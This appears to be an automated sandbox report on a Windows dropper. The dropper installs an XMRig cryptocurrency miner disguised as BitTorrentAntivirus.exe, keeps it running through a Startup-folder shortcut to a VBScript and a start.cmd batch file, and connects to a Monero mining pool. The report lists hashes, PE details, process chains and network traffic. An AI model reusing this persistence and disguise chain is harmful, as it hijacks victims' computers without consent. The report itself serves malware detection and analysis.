C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl.0001 (copy)

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.11249306322602246
Encrypted:	false
SSDEEP:	12:qlmXm/Ey6q999583m1mK2P3qQ10nMCldimE8eawHza1mKil8d:gl68a3m1iPLyMCldzE9BHza1H
MD5:	E31A41EF7033CE32F4D868246A5F9DD7
SHA1:	EA6A1B01F59B5EA48DAE0E12B1BC5CFBEE642D53
SHA-256:	B773DC35986FD49C5C9F0ECEAD2940C128343F22B20006FADAF173308FEAF681
SHA-512:	21C0E0118BD080B274FF5B047FB3F38B57A7D57CD78C9CE0099A98285E75781CD1A773CCD9AC2597B0D8C56A32623B685A4E7EBC790BF93825E7A05EBFF01853
Malicious:	false
Preview:	................................................................................@...x............................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................%.1..... ........mW...........U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P.@...x... .......................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\H.vbs.lnk

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Archive, ctime=Tue May 9 08:19:07 2023, mtime=Tue May 9 08:19:07 2023, atime=Tue Apr 12 12:59:07 2022, length=103, window=hide
Category:	dropped
Size (bytes):	669
Entropy (8bit):	4.5471760355691835
Encrypted:	false
SSDEEP:	12:8n17KecGDCrezLzXjAdKEirSbPjEMbWKsyzg5syznGm:8Hw2zAoqLE4FzghzGm
MD5:	A516CCE8FBA8A70AD1820CE28044D31F
SHA1:	9B70743916710ED22B8A12F5966F606391405666
SHA-256:	79655E26E3C6303B7A04A30847C5AE5EA97E6B4515B0F1E7A663BECA5509EBD0
SHA-512:	351B8ACFDDAB6D8D63D32575E38E17A9E849E98DF062B8038C999868B5A58404C230C1BB282C62198C85C2DF265CA8F84AB3635460F604E2795BFCF96C105574
Malicious:	true
Preview:	L..................F.... ....x.NW....x.NW...4..zuN..g............................P.O. .:i.....+00.../C:\...................`.1......P...PROGRA~3..H......L..V[J....F......................._.P.r.o.g.r.a.m.D.a.t.a.....P.2.g....Tdo .H.vbs.<......VdJ.VdJ....ZT.....................LZ.H...v.b.s.......C...............-.......B..............M.....C:\ProgramData\H.vbs....H...v.b.s.,.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m.D.a.t.a.\.H...v.b.s...C.:.\.P.r.o.g.r.a.m.D.a.t.a.`.......X.......468325...........!a..%.H.VZAj...%.............-..!a..%.H.VZAj...%.............-.E.......9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Logs\dosvc.20230509_092058_376.etl

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	1.3054701409571838
Encrypted:	false
SSDEEP:	12:8ZBQXe0yJq99953AaTG6P0+RSQ9aTQ1olfW+08sRT+U+lWeYzw9X:UXJ8SWG6P0+RSHMizgTaWeYzw9X
MD5:	D552428B4A73BDE4E12D944D06FA81E2
SHA1:	82851C029467644917B8FB49E8143C3C3970CE5E
SHA-256:	3C634CFECEFA32DD4307BD27C2D1736C3F98EC15998A28485FEB28823D24293C
SHA-512:	6A958FBD0001AFED16EB4FBBF2C0A432B60BB083076AA974CDF81689783BC1B4E65891923DCB3A91CD28AA7F4A8B6D610F44DEF5D19DEDD540BB3073F652FEFA
Malicious:	false
Preview:	.... ... ....................................... ...!.....................................m......................B..............Zb... ... ..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1.............................................................WW...... .......W...........8.6.9.6.E.A.C.4.-.1.2.8.8.-.4.2.8.8.-.A.4.E.E.-.4.9.E.E.4.3.1.B.0.A.D.9...C.:.\.W.i.n.d.o.w.s.\.S.e.r.v.i.c.e.P.r.o.f.i.l.e.s.\.N.e.t.w.o.r.k.S.e.r.v.i.c.e.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.D.e.l.i.v.e.r.y.O.p.t.i.m.i.z.a.t.i.o.n.\.L.o.g.s.\.d.o.s.v.c...2.0.2.3.0.5.0.9._.0.9.2.0.5.8._.3.7.6...e.t.l.........P.P...........m.....................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.993876389389049
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	8293685
MD5:	4c23a75127969f41341ae122e46f86e6
SHA1:	3832a0bf804d20a189e81f1f38592c83f5ce6b0a
SHA256:	fd975f721676ab06f6158d4999c83e97a8946059f0b4b0bbc3919eec67f220ea
SHA512:	ad391afa2011f5c3f9c1afdd5aaf4256bab1d96d461f7fdc544f780bf285fa01a57820db19521e53573a8643e44b85c6bc34fa30a3dc0c10cad3d2eb0fcfe035
SSDEEP:	196608:baSLasbDAmxfacy6JinAWX7OCeTYqOtSpIokyXS+w:baqasvAmNc6JiAO7xeTLYIXS+w
TLSH:	66863321FDD694B2E1E13E7B01AA66500C1F78200F358EEA979C45BE6766980F7317B3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...+...._......._..'...._f.'...._..'..

File Icon


Icon Hash:	00e184a2a6c86300

Static PE Info

General

Entrypoint:	0x41eef0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x60C329FF [Fri Jun 11 09:16:47 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	fcf1390e9ce472c7270447fc5c61a0c1

Entrypoint Preview

Instruction
call 00007F5070A90E19h
jmp 00007F5070A9083Dh
cmp ecx, dword ptr [0043E668h]
jne 00007F5070A909B5h
ret
jmp 00007F5070A90F9Eh
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F5070A837B7h
mov dword ptr [esi], 00435580h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 00435588h
mov dword ptr [ecx], 00435580h
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 00435568h
push eax
call 00007F5070A93B3Dh
pop ecx
ret
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007F5070A8374Eh
push 0043B704h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007F5070A93300h
int3
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007F5070A90954h
push 0043B91Ch
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007F5070A932E3h
int3
jmp 00007F5070A952B3h
jmp dword ptr [00433260h]
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push 00422150h
push dword ptr fs:[00000000h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[C++] VS2015 UPD3.1 build 24215
[EXP] VS2015 UPD3.1 build 24215
[RES] VS2015 UPD3 build 24213
[LNK] VS2015 UPD3.1 build 24215

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x3c830	0x34	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3c864	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x63000	0x70c3	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x6b000	0x227c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3aac0	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x35508	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x33000	0x260	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x3bdc4	0x120	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x313ba	0x31400	False	0.5840141180203046	data	6.709807872238317	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x33000	0xa622	0xa800	False	0.45317150297619047	data	5.222677614328155	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x23728	0x1000	False	0.36767578125	data	3.7088186669877685	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat	0x62000	0x18c	0x200	False	0.447265625	data	3.3554341882340144	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x63000	0x70c3	0x7200	False	0.7182017543859649	data	7.002711394697601	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x6b000	0x227c	0x2400	False	0.7757161458333334	data	6.564176621980741	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
PNG	0x63524	0xb45	PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced	English	United States
PNG	0x6406c	0x15a9	PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced	English	United States
RT_ICON	0x65618	0x2782	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States
RT_DIALOG	0x67d9c	0x286	data	English	United States
RT_DIALOG	0x68024	0x13a	data	English	United States
RT_DIALOG	0x68160	0xec	data	English	United States
RT_DIALOG	0x6824c	0x12e	data	English	United States
RT_DIALOG	0x6837c	0x338	data	English	United States
RT_DIALOG	0x686b4	0x252	data	English	United States
RT_STRING	0x68908	0x1e2	data	English	United States
RT_STRING	0x68aec	0x1cc	data	English	United States
RT_STRING	0x68cb8	0x1b8	data	English	United States
RT_STRING	0x68e70	0x146	data	English	United States
RT_STRING	0x68fb8	0x446	data	English	United States
RT_STRING	0x69400	0x166	data	English	United States
RT_STRING	0x69568	0x152	data	English	United States
RT_STRING	0x696bc	0x10a	data	English	United States
RT_STRING	0x697c8	0xbc	data	English	United States
RT_STRING	0x69884	0xd6	data	English	United States
RT_GROUP_ICON	0x6995c	0x14	data	English	United States
RT_MANIFEST	0x69970	0x753	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States

Imports

DLL

Import

KERNEL32.dll

GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer

gdiplus.dll

GdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 9, 2023 02:19:23.548593998 CEST	49699	3333	192.168.2.3	141.94.96.71
May 9, 2023 02:19:23.568574905 CEST	3333	49699	141.94.96.71	192.168.2.3
May 9, 2023 02:19:23.568695068 CEST	49699	3333	192.168.2.3	141.94.96.71
May 9, 2023 02:19:23.570015907 CEST	49699	3333	192.168.2.3	141.94.96.71
May 9, 2023 02:19:23.589518070 CEST	3333	49699	141.94.96.71	192.168.2.3
May 9, 2023 02:19:23.589726925 CEST	3333	49699	141.94.96.71	192.168.2.3
May 9, 2023 02:19:23.771886110 CEST	49699	3333	192.168.2.3	141.94.96.71
May 9, 2023 02:19:28.239614010 CEST	3333	49699	141.94.96.71	192.168.2.3
May 9, 2023 02:19:28.381664038 CEST	49699	3333	192.168.2.3	141.94.96.71
May 9, 2023 02:19:35.432836056 CEST	3333	49699	141.94.96.71	192.168.2.3
May 9, 2023 02:19:35.585335016 CEST	49699	3333	192.168.2.3	141.94.96.71
May 9, 2023 02:19:44.167699099 CEST	3333	49699	141.94.96.71	192.168.2.3
May 9, 2023 02:19:44.273652077 CEST	49699	3333	192.168.2.3	141.94.96.71
May 9, 2023 02:19:58.525861025 CEST	3333	49699	141.94.96.71	192.168.2.3
May 9, 2023 02:19:58.587354898 CEST	49699	3333	192.168.2.3	141.94.96.71
May 9, 2023 02:20:24.157733917 CEST	3333	49699	141.94.96.71	192.168.2.3
May 9, 2023 02:20:24.277151108 CEST	49699	3333	192.168.2.3	141.94.96.71
May 9, 2023 02:20:35.472167015 CEST	3333	49699	141.94.96.71	192.168.2.3
May 9, 2023 02:20:35.590588093 CEST	49699	3333	192.168.2.3	141.94.96.71
May 9, 2023 02:20:36.743071079 CEST	3333	49699	141.94.96.71	192.168.2.3
May 9, 2023 02:20:36.887590885 CEST	49699	3333	192.168.2.3	141.94.96.71
May 9, 2023 02:20:46.886956930 CEST	3333	49699	141.94.96.71	192.168.2.3
May 9, 2023 02:20:47.091571093 CEST	49699	3333	192.168.2.3	141.94.96.71
May 9, 2023 02:20:56.986291885 CEST	3333	49699	141.94.96.71	192.168.2.3
May 9, 2023 02:20:57.092484951 CEST	49699	3333	192.168.2.3	141.94.96.71
May 9, 2023 02:21:04.829935074 CEST	3333	49699	141.94.96.71	192.168.2.3
May 9, 2023 02:21:04.890013933 CEST	49699	3333	192.168.2.3	141.94.96.71
May 9, 2023 02:21:14.834844112 CEST	3333	49699	141.94.96.71	192.168.2.3
May 9, 2023 02:21:14.890846014 CEST	49699	3333	192.168.2.3	141.94.96.71
May 9, 2023 02:21:24.936223984 CEST	3333	49699	141.94.96.71	192.168.2.3
May 9, 2023 02:21:25.094891071 CEST	49699	3333	192.168.2.3	141.94.96.71
May 9, 2023 02:21:30.470527887 CEST	49699	3333	192.168.2.3	141.94.96.71
May 9, 2023 02:21:30.490236044 CEST	3333	49699	141.94.96.71	192.168.2.3
May 9, 2023 02:21:30.508507013 CEST	3333	49699	141.94.96.71	192.168.2.3
May 9, 2023 02:21:30.595357895 CEST	49699	3333	192.168.2.3	141.94.96.71
May 9, 2023 02:21:35.152964115 CEST	3333	49699	141.94.96.71	192.168.2.3
May 9, 2023 02:21:35.283236027 CEST	49699	3333	192.168.2.3	141.94.96.71
May 9, 2023 02:21:35.511152029 CEST	3333	49699	141.94.96.71	192.168.2.3
May 9, 2023 02:21:35.595783949 CEST	49699	3333	192.168.2.3	141.94.96.71
May 9, 2023 02:21:45.659272909 CEST	49699	3333	192.168.2.3	141.94.96.71
May 9, 2023 02:21:45.678790092 CEST	3333	49699	141.94.96.71	192.168.2.3
May 9, 2023 02:21:45.697968006 CEST	3333	49699	141.94.96.71	192.168.2.3
May 9, 2023 02:21:45.784147024 CEST	49699	3333	192.168.2.3	141.94.96.71

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 9, 2023 02:19:23.508774042 CEST	62704	53	192.168.2.3	8.8.8.8
May 9, 2023 02:19:23.538635969 CEST	53	62704	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 9, 2023 02:19:23.508774042 CEST	192.168.2.3	8.8.8.8	0xe000	Standard query (0)	pool.supportxmr.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
May 9, 2023 02:19:23.538635969 CEST	8.8.8.8	192.168.2.3	0xe000	No error (0)	pool.supportxmr.com	pool-fr.supportxmr.com		CNAME (Canonical name)	IN (0x0001)	false
May 9, 2023 02:19:23.538635969 CEST	8.8.8.8	192.168.2.3	0xe000	No error (0)	pool-fr.supportxmr.com		141.94.96.71	A (IP address)	IN (0x0001)	false
May 9, 2023 02:19:23.538635969 CEST	8.8.8.8	192.168.2.3	0xe000	No error (0)	pool-fr.supportxmr.com		141.94.96.195	A (IP address)	IN (0x0001)	false
May 9, 2023 02:19:23.538635969 CEST	8.8.8.8	192.168.2.3	0xe000	No error (0)	pool-fr.supportxmr.com		141.94.96.144	A (IP address)	IN (0x0001)	false

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: file.exePID: 1304, Parent PID: 3452

General

Target ID:	0
Start time:	02:19:05
Start date:	09/05/2023
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\file.exe
Imagebase:	0xe60000
File size:	8293685 bytes
MD5 hash:	4C23A75127969F41341AE122E46F86E6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: wscript.exePID: 6704, Parent PID: 1304

General

Target ID:	1
Start time:	02:19:10
Start date:	09/05/2023
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\ProgramData\H.vbs"
Imagebase:	0xe60000
File size:	147456 bytes
MD5 hash:	7075DD7B9BE8807FCA93ACD86F724884
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 6800, Parent PID: 6704

General

Target ID:	2
Start time:	02:19:11
Start date:	09/05/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\ProgramData\start.cmd" "
Imagebase:	0xb0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6760, Parent PID: 6800

General

Target ID:	3
Start time:	02:19:11
Start date:	09/05/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000003.00000002.599501597.000001BCB717A000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: BitTorrentAntivirus.exePID: 6912, Parent PID: 6800

General

Target ID:	4
Start time:	02:19:11
Start date:	09/05/2023
Path:	C:\ProgramData\BitTorrentAntivirus.exe
Wow64 process (32bit):	false
Commandline:	BitTorrentAntivirus.exe
Imagebase:	0x7ff65d190000
File size:	8552960 bytes
MD5 hash:	686986CF6A5FD23DE42A436BF83F78D3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000004.00000003.290546847.00000204E0298000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000004.00000002.599232877.00000204E024C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000004.00000002.599038191.00000204DE955000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 71%, ReversingLabs Detection: 60%, Virustotal, Browse
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: wscript.exePID: 6900, Parent PID: 3452

General

Target ID:	5
Start time:	02:19:18
Start date:	09/05/2023
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\ProgramData\H.vbs"
Imagebase:	0x7ff795220000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 7008, Parent PID: 580

General

Target ID:	6
Start time:	02:19:19
Start date:	09/05/2023
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Imagebase:	0x7ff651c80000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 7032, Parent PID: 580

General

Target ID:	7
Start time:	02:19:19
Start date:	09/05/2023
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k unistacksvcgroup
Imagebase:	0x7ff651c80000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 6984, Parent PID: 6900

General

Target ID:	8
Start time:	02:19:23
Start date:	09/05/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\ProgramData\start.cmd" "
Imagebase:	0x7ff707bb0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6856, Parent PID: 6984

General

Target ID:	9
Start time:	02:19:23
Start date:	09/05/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: BitTorrentAntivirus.exePID: 2764, Parent PID: 6984

General

Target ID:	10
Start time:	02:19:23
Start date:	09/05/2023
Path:	C:\ProgramData\BitTorrentAntivirus.exe
Wow64 process (32bit):
Commandline:	BitTorrentAntivirus.exe
Imagebase:
File size:	8552960 bytes
MD5 hash:	686986CF6A5FD23DE42A436BF83F78D3
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: wermgr.exePID: 3156, Parent PID: 580

General

Target ID:	11
Start time:	02:20:40
Start date:	09/05/2023
Path:	C:\Windows\System32\wermgr.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\wermgr.exe" "-outproc" "0" "580" "2100" "1976" "2020" "0" "0" "2248" "0" "0" "0" "0" "0"
Imagebase:	0x7ff64c790000
File size:	209312 bytes
MD5 hash:	FF214585BF10206E21EA8EBA202FACFD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 4280, Parent PID: 580

General

Target ID:	12
Start time:	02:20:41
Start date:	09/05/2023
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Imagebase:	0x7ff651c80000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 4648, Parent PID: 580

General

Target ID:	13
Start time:	02:20:45
Start date:	09/05/2023
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:	0x7ff651c80000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 6872, Parent PID: 580

General

Target ID:	14
Start time:	02:20:58
Start date:	09/05/2023
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k NetworkService -p
Imagebase:	0x7ff651c80000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: file.exePID: 1304, Parent PID: 3452COMMON

Execution Graph

Execution Coverage:	11.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	9.2%
Total number of Nodes:	1666
Total number of Limit Nodes:	25

Executed Functions

